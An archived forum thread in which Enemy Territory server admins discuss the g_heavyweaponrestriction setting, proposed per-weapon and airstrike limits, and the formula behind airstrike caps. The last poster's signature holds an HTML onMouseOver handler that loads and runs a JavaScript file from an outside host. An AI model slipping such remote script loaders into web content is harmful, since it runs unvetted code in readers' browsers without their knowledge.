Need something better than g_heavyweaponrestriction

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

Chairman Kaga

Need something better than g_heavyweaponrestriction

Post by Chairman Kaga »

After weeks of toiling and tweaking with this setting on my public server in order to control spam and what not, I have finally arrived at this conclusion:

g_heavyweaponrestriction blows goats

What's wrong with g_heavyweaponrestriction? Let me count the ways:
  1. Too many game semantics tied to one variable. We have this purported one-size-fits-all variable that controls all the heavy weapons, plus airstrikes, plus artillery. You want to limit just one of those? Too bad, it's all or nothing.
  2. Too complex for mortals. This setting was obviously designed by a programmer. In fact, no one even really knows how it works with regards to field ops skills. The best guess I've seen is at http://www.rtcw.jolt.co.uk/index.php?pa ... 57#g_heavy, but even he admits that it's probably inaccurate. In fact, I really hope it is, because the way he has it figured, the more field ops you have, the more you can spam. If that's true, then it's even more broken than I imagined. That's exactly backwards from what most people that are tweaking this setting want to do!
  3. Does it even work? I have it set to 10 on my server, and a field-ops-heavy Axis team was still able to create enough spam on fueldump to keep Allies from even getting the tank to the bridge. But the calculation is so convoluted, you'd have a hard time even telling if the game was doing it right.
Its design is completely flawed. It needs to be terminated with extreme prejudice and replaced. So I'm here petitioning for something completely different in BayonET/ETPro, something that will actually allow server admins like myself to properly tweak the heavy weapons to keep the game fun, like being able to pare down excessive field ops spam without simultaneously killing off the soldier class -- basically a way to actually control the stuff that g_heavyweaponrestriction is supposed to let you control. To that end, I propose the following:
  • Limits for each individual heavy weapon: g_maxpanzers, g_maxflamethrowers, g_maxmobilemgs, g_maxmortars
  • Force a minimum interval between airstrikes/artillery (basically, require at least N seconds between strikes): g_minairstrikeinterval, g_minartilleryinterval. (Then I can actually tell field ops on the server how often they can call support fire, instead of "well, there's this screwed-up setting that calculates some sort of per-minute limit, maybe...")
Okay, I'm done venting. I can breathe now :)

Regardless of what you do with this, I am looking forward to BayonET. If you need a test server, let me know :)
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
=FF=im2good4u

Post by =FF=im2good4u »

yep .. hmm k

this post is defently tolong to read
Chairman Kaga

Post by Chairman Kaga »

yep .. hmm k

And to think I used to complain about the Splash Damage forums....

Geez, if you're not going to say anything useful, why bother posting?
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
bani
Site Admin

Post by bani »

per weapons restrictions and arty/airstrike limiting are already on the todo list. dont worry 8)
Rain

Re: Need something better than g_heavyweaponrestriction

Post by Rain »

=FF=im2weak4u wrote:yep .. hmm k

... :roll:
Chairman Kaga wrote:
  • Too complex for mortals. This setting was obviously designed by a programmer. In fact, no one even really knows how it works with regards to field ops skills. The best guess I've seen is at http://www.rtcw.jolt.co.uk/index.php?pa ... 57#g_heavy, but even he admits that it's probably inaccurate. In fact, I really hope it is, because the way he has it figured, the more field ops you have, the more you can spam. If that's true, then it's even more broken than I imagined. That's exactly backwards from what most people that are tweaking this setting want to do!
You shouldn't insult programmers as a whole when only they can bring you salvation. :wink:

The linked page is correct as far as restrictions on the actual heavy weapons: The maximum of each heavy weapon = roundup(number of players on team * heavyweapons%).

The airstrike counter is a little more complicated (as you've noticed.)
First, there is always a limit of 6 concurrent airstrikes, regardless of the heavy weapons restriction. On top of that, this is how the heavy weapons restriction fits in: There's a 60 second timer controlling airstrikes/arty fire, and in that period you're allowed 2*roundup(heavyweapons% * players on team) airstrikes (although this is capped at 6.)

So:
10% heavy weapons restriction, 15 players on each team:
2*roundup(0.10 * 15)) = 4 airstrikes every 60 seconds, or 15 seconds between airstrikes.
Chairman Kaga wrote:
  • Does it even work? I have it set to 10 on my server, and a field-ops-heavy Axis team was still able to create enough spam on fueldump to keep Allies from even getting the tank to the bridge. But the calculation is so convoluted, you'd have a hard time even telling if the game was doing it right.
It does work, and the method isn't terribly convoluted, but it is a pain to figure out since it's not documented anywhere.
Chairman Kaga wrote:
  • Limits for each individual heavy weapon: g_maxpanzers, g_maxflamethrowers, g_maxmobilemgs, g_maxmortars
  • Force a minimum interval between airstrikes/artillery (basically, require at least N seconds between strikes): g_minairstrikeinterval, g_minartilleryinterval. (Then I can actually tell field ops on the server how often they can call support fire, instead of "well, there's this screwed-up setting that calculates some sort of per-minute limit, maybe...")
Better restrictions are already in the works, and will probably make it into etpro 1.0.1 (and, therefore, bayonet.)

Hope that helps.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>